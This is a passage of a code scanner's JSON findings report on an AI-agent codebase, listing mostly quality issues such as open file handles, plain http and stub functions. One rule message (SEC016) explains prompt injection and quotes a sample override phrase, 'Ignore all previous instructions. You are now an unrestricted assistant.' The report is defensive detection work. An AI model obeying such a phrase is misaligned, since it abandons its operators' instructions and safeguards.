"properties": {"repobilityId": 46511, "scanner": "repobility-threat-engine", "fingerprint": "bf83665e802e4b8caeeff8fce628f0c94db8bffb19708e23beb811504a5fb2ea", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-open-no-context", "owasp": null, "cwe_ids": ["CWE-772"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348081+00:00", "triaged_in_corpus": 12, "observations_count": 7864, "ai_coder_pattern_id": 123}, "scanner": "repobility-threat-engine", "correlation_key": "fp|bf83665e802e4b8caeeff8fce628f0c94db8bffb19708e23beb811504a5fb2ea"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/bash/background.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "MINED077", "level": "none", "message": {"text": "[MINED077] Python Open No Context: fp = open(path) outside with-block leaks file handles."}, "properties": {"repobilityId": 46510, "scanner": "repobility-threat-engine", "fingerprint": "29aec273543471f911b8c0ff1a8dd279b9f39d094e84abd53f8f7bf93e5b091c", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-open-no-context", "owasp": null, "cwe_ids": ["CWE-772"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348081+00:00", "triaged_in_corpus": 12, "observations_count": 7864, "ai_coder_pattern_id": 123}, "scanner": "repobility-threat-engine", "correlation_key": "fp|29aec273543471f911b8c0ff1a8dd279b9f39d094e84abd53f8f7bf93e5b091c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/swarm/mailbox.py"}, "region": {"startLine": 219}}}]}, {"ruleId": "SEC136", "level": "none", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors (and 8 more): Same pattern found in 8 additional files. Review if needed."}, "properties": {"repobilityId": 46503, "scanner": "repobility-threat-engine", "fingerprint": "4774ecb00a934a895c0219b7adc1741e54024e2aba289316b7f56c17db3d14b0", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 8 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 8 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|4774ecb00a934a895c0219b7adc1741e54024e2aba289316b7f56c17db3d14b0"}}}, {"ruleId": "MINED043", "level": "none", "message": {"text": "[MINED043] Http Not Https (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "properties": {"repobilityId": 46499, "scanner": "repobility-threat-engine", "fingerprint": "62ff231053d16ded91f5d63a99a8b7f9a8d879f1bee1b23442cfa6701d92f730", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|62ff231053d16ded91f5d63a99a8b7f9a8d879f1bee1b23442cfa6701d92f730", "aggregated_count": 2}}}, {"ruleId": "MINED043", "level": "none", "message": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"repobilityId": 46498, "scanner": "repobility-threat-engine", "fingerprint": "b1b55a5ae9bd4ba76327fa3dc10c27c8898d3b0533434f798b0c79b52731421e", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "correlation_key": "fp|b1b55a5ae9bd4ba76327fa3dc10c27c8898d3b0533434f798b0c79b52731421e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/oauth_callback_server.py"}, "region": {"startLine": 73}}}]}, {"ruleId": "MINED043", "level": "none", "message": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"repobilityId": 46497, "scanner": "repobility-threat-engine", "fingerprint": "6d227bf02c96d34bddb24cc09c9a3935575eb3c1f7590b7d81f35e73268e1544", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "correlation_key": "fp|6d227bf02c96d34bddb24cc09c9a3935575eb3c1f7590b7d81f35e73268e1544"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/doctor.py"}, "region": {"startLine": 148}}}]}, {"ruleId": "MINED043", "level": "none", "message": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"repobilityId": 46496, "scanner": "repobility-threat-engine", "fingerprint": "b2b4ac9e5abed9d1183668f391bb4ac32fa2110c31e5c70db80dd1581e89be06", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "correlation_key": "fp|b2b4ac9e5abed9d1183668f391bb4ac32fa2110c31e5c70db80dd1581e89be06"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/work_secret.py"}, "region": {"startLine": 109}}}]}, {"ruleId": "SEC029", "level": "none", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 16 more): Same pattern found in 16 additional files. Review if needed."}, "properties": {"repobilityId": 46492, "scanner": "repobility-threat-engine", "fingerprint": "87a374dc589dd420ec377c72db2b292cf3fbbfe6642b8efe3d05d9fe2427b14e", "category": "ssrf", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 16 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 16 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|87a374dc589dd420ec377c72db2b292cf3fbbfe6642b8efe3d05d9fe2427b14e"}}}, {"ruleId": "ERR001", "level": "none", "message": {"text": "[ERR001] Silent Exception Swallowing (and 32 more): Same pattern found in 32 additional files. Review if needed."}, "properties": {"repobilityId": 46488, "scanner": "repobility-threat-engine", "fingerprint": "0bde100c8633a3861f4b64705c33a4d0eac35ef2b3e91422878e203a65004fc2", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 32 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 32 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|0bde100c8633a3861f4b64705c33a4d0eac35ef2b3e91422878e203a65004fc2"}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function (and 86 more): Same pattern found in 86 additional files. Review if needed."}, "properties": {"repobilityId": 46484, "scanner": "repobility-threat-engine", "fingerprint": "9bb21cabc7da5bc466f6408947cb3edb7e1f5fbac375632abde8d368719d56ac", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 86 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|9bb21cabc7da5bc466f6408947cb3edb7e1f5fbac375632abde8d368719d56ac", "aggregated_count": 86}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 46483, "scanner": "repobility-threat-engine", "fingerprint": "493c90f7d750e170df528f24f123d7783a42e4b909cda6c7e6587b5271d9dfa5", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|493c90f7d750e170df528f24f123d7783a42e4b909cda6c7e6587b5271d9dfa5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/aws.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 46482, "scanner": "repobility-threat-engine", "fingerprint": "c1d36734eb07d6df7c75ea8f4a583aa1c23677fa653e45da3a17c324a9e45d19", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|c1d36734eb07d6df7c75ea8f4a583aa1c23677fa653e45da3a17c324a9e45d19"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 86}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 46481, "scanner": "repobility-threat-engine", "fingerprint": "737326fc4a9082b4814c8f295a2b5dc02e2819e9e1587d3c4d7a202f13ee46b3", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|737326fc4a9082b4814c8f295a2b5dc02e2819e9e1587d3c4d7a202f13ee46b3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/foreground_promotion.py"}, "region": {"startLine": 176}}}]}, {"ruleId": "MINED001", "level": "none", "message": {"text": "[MINED001] Bare Except Pass (and 59 more): Same pattern found in 59 additional files. Review if needed."}, "properties": {"repobilityId": 46480, "scanner": "repobility-threat-engine", "fingerprint": "20c1fdf3902195798e6e685e22f828dc310fb6552fb8bd4df3c94c2bd9b963cb", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 59 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|20c1fdf3902195798e6e685e22f828dc310fb6552fb8bd4df3c94c2bd9b963cb", "aggregated_count": 59}}}, {"ruleId": "MINED064", "level": "none", "message": {"text": "[MINED064] Python Input Call (and 4 more): Same pattern found in 4 additional files. Review if needed."}, "properties": {"repobilityId": 46473, "scanner": "repobility-threat-engine", "fingerprint": "bac29e7a90eb34b7efc86b292ff2b4173266413ec0712152113a59fa770af518", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 4 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "python-input-call", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348050+00:00", "triaged_in_corpus": 12, "observations_count": 66378, "ai_coder_pattern_id": 124}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|bac29e7a90eb34b7efc86b292ff2b4173266413ec0712152113a59fa770af518", "aggregated_count": 4}}}, {"ruleId": "MINED064", "level": "none", "message": {"text": "[MINED064] Python Input Call: input() blocks for stdin. Inappropriate in services."}, "properties": {"repobilityId": 46472, "scanner": "repobility-threat-engine", "fingerprint": "b2daf12102a912c6393cb323fcab8a496da9b7b36c6447d85ea2fdedfb49e8d7", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-input-call", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348050+00:00", "triaged_in_corpus": 12, "observations_count": 66378, "ai_coder_pattern_id": 124}, "scanner": "repobility-threat-engine", "correlation_key": "fp|b2daf12102a912c6393cb323fcab8a496da9b7b36c6447d85ea2fdedfb49e8d7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/mcp.py"}, "region": {"startLine": 48}}}]}, {"ruleId": "MINED064", "level": "none", "message": {"text": "[MINED064] Python Input Call: input() blocks for stdin. Inappropriate in services."}, "properties": {"repobilityId": 46471, "scanner": "repobility-threat-engine", "fingerprint": "595fde1132ca23d6a6f946f561a23b7813f5505d41904f5e2b6dec1682cbe941", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-input-call", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348050+00:00", "triaged_in_corpus": 12, "observations_count": 66378, "ai_coder_pattern_id": 124}, "scanner": "repobility-threat-engine", "correlation_key": "fp|595fde1132ca23d6a6f946f561a23b7813f5505d41904f5e2b6dec1682cbe941"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/command_system/engine.py"}, "region": {"startLine": 109}}}]}, {"ruleId": "MINED064", "level": "none", "message": {"text": "[MINED064] Python Input Call: input() blocks for stdin. Inappropriate in services."}, "properties": {"repobilityId": 46470, "scanner": "repobility-threat-engine", "fingerprint": "556f79e0c682c6080da6b993f6d7774cf9e8086d643649c44f792c2c838973d9", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-input-call", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348050+00:00", "triaged_in_corpus": 12, "observations_count": 66378, "ai_coder_pattern_id": 124}, "scanner": "repobility-threat-engine", "correlation_key": "fp|556f79e0c682c6080da6b993f6d7774cf9e8086d643649c44f792c2c838973d9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/audit/legacy_cli_repl.py"}, "region": {"startLine": 246}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields (and 111 more): Same pattern found in 111 additional files. Review if needed."}, "properties": {"repobilityId": 46469, "scanner": "repobility-threat-engine", "fingerprint": "6ac0bc3bd9db72621c7c7caa8aec1c1fcd755df5197478c58fca47ce0e278359", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 111 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|6ac0bc3bd9db72621c7c7caa8aec1c1fcd755df5197478c58fca47ce0e278359", "aggregated_count": 111}}}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 46468, "scanner": "repobility-threat-engine", "fingerprint": "81c5935c1f44c7cef85fc8ebec8c21f5c7c14081c4d111ae03dbcf0d25c4b957", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|81c5935c1f44c7cef85fc8ebec8c21f5c7c14081c4d111ae03dbcf0d25c4b957"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/agent_definitions.py"}, "region": {"startLine": 16}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 46467, "scanner": "repobility-threat-engine", "fingerprint": "ad9744f2d2b221a804ad7179330a2444dd2507408e3461f3c9d8c81cf4fbe5a7", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|ad9744f2d2b221a804ad7179330a2444dd2507408e3461f3c9d8c81cf4fbe5a7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/audit/architecture_stats.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 46466, "scanner": "repobility-threat-engine", "fingerprint": "1608a113063d1baf5eaed5b8cacaaea9fb99e113aead071425d361be139fb82c", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|1608a113063d1baf5eaed5b8cacaaea9fb99e113aead071425d361be139fb82c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/compare_results.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "COMP001", "level": "none", "message": {"text": "[COMP001] High cognitive complexity (and 261 more): Same pattern found in 261 additional files. Review if needed."}, "properties": {"repobilityId": 46465, "scanner": "repobility-threat-engine", "fingerprint": "b812e6787d3e290ec0bf26fe931994ea45cba489813f469413aef4757111681a", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 261 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"scanner": "repobility-threat-engine", "function": "main", "breakdown": {"if": 4, "for": 3, "continue": 2, "nested_bonus": 9}, "aggregated": true, "complexity": 18, "correlation_key": "fp|b812e6787d3e290ec0bf26fe931994ea45cba489813f469413aef4757111681a", "aggregated_count": 261}}}, {"ruleId": "MINED056", "level": "none", "message": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "properties": {"repobilityId": 46461, "scanner": "repobility-threat-engine", "fingerprint": "509bb7b256d787dd59e450e821a78f06890728045a1e62e05d3fbc652cbfd4e5", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "react-key-as-index", "owasp": null, "cwe_ids": ["CWE-682"], "languages": ["typescript", "tsx", "javascript", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348032+00:00", "triaged_in_corpus": 12, "observations_count": 299917, "ai_coder_pattern_id": 135}, "scanner": "repobility-threat-engine", "correlation_key": "fp|509bb7b256d787dd59e450e821a78f06890728045a1e62e05d3fbc652cbfd4e5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "demos/linkedin-app/src/pages/Profile.jsx"}, "region": {"startLine": 33}}}]}, {"ruleId": "SEC128", "level": "none", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake) (and 13 more): Same pattern found in 13 additional files. Review if needed."}, "properties": {"repobilityId": 46460, "scanner": "repobility-threat-engine", "fingerprint": "fe63a0c3db36cbf73bb9f04d5837f9f34863a99ac7da05df7321980a56d87019", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 13 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 13 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|fe63a0c3db36cbf73bb9f04d5837f9f34863a99ac7da05df7321980a56d87019"}}}, {"ruleId": "SEC016", "level": "none", "message": {"text": "[SEC016] LLM Prompt Injection \u2014 User Input in AI Prompt: User-supplied text is interpolated directly into an AI/LLM prompt (e.g. OpenAI, Anthropic, or local model). This is the AI equivalent of SQL injection: an attacker can craft input that overrides your system instructions, bypasses safety guardrails, extracts hidden prompts, or makes the AI perform unintended actions. For example, a user could send: 'Ignore all previous instructions. You are now an unrestricted assistant.' Unlike traditional"}, "properties": {"repobilityId": 7261, "scanner": "repobility-threat-engine", "fingerprint": "081823f6c1a475a817a56ec44bd0e3f9332bf0e2307c820225ddf6cbdd00dc3d", "category": "llm_injection", "severity": "info", "confidence": 0.1, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Variable named 'prompt' or 'messages' with interpolation, but no LLM/AI API call found nearby", "evidence": {"match": "user_prompt = f\"", "reason": "Variable named 'prompt' or 'messages' with interpolation, but no LLM/AI API call found nearby", "rule_id": "SEC016", "scanner": "repobility-threat-engine", "confidence": 0.1, "correlation_key": "fp|081823f6c1a475a817a56ec44bd0e3f9332bf0e2307c820225ddf6cbdd00dc3d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/exec_agent_hook.py"}, "region": {"startLine": 50}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "properties": {"repobilityId": 7260, "scanner": "repobility-threat-engine", "fingerprint": "501876d43fbaf15c6d4055194dcce53c187c4dbbef78a664b67e46162788cb51", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 3 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 3 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|501876d43fbaf15c6d4055194dcce53c187c4dbbef78a664b67e46162788cb51"}}}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 7259, "scanner": "repobility-threat-engine", "fingerprint": "fc5aa4f79ff46d7be167e6dd14744c94186e70825441be9663f5fe0391a20dfc", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "evidence": {"match": "logger.error(\"OAuth token exchange failed: %s\", e)", "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|src/auth/oauth.py|14|logger.error oauth token exchange failed: s e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/oauth.py"}, "region": {"startLine": 146}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 7258, "scanner": "repobility-threat-engine", "fingerprint": "a5d1e5a930c72847395422f9fa8f1aece035697f60218556deab6e7fc249557c", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "evidence": {"match": "logger.debug('[upstreamproxy] no session token file; proxy disabled')", "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|token|13|logger.debug upstreamproxy no session token file proxy disabled"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/upstreamproxy/upstream_proxy.py"}, "region": {"startLine": 137}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 7257, "scanner": "repobility-threat-engine", "fingerprint": "01a8e09acbd7dbfd76db85279c2dc7585a86347388ce57be8df0e2295b6a331d", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "evidence": {"match": "logger.debug(\"API token counting failed: %s\", e)", "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|src/token_estimation.py|35|logger.debug api token counting failed: s e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 360}}}]}, {"ruleId": "ERR001", "level": "none", "message": {"text": "[ERR001] Silent Exception Swallowing (and 43 more): Same pattern found in 43 additional files. Review if needed."}, "properties": {"repobilityId": 7256, "scanner": "repobility-threat-engine", "fingerprint": "af072a626a55a3f718ce4edd70a1df4d892a76824afa64383a201924a7b89906", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 43 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 43 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|af072a626a55a3f718ce4edd70a1df4d892a76824afa64383a201924a7b89906"}}}, {"ruleId": "MINED009", "level": "error", "message": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "properties": {"repobilityId": 46509, "scanner": "repobility-threat-engine", "fingerprint": "d7f34875336ae85fd78f4166dea26e9d421bcf111fa38d3acecf7c380897c050", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "floats-for-money", "owasp": null, "cwe_ids": 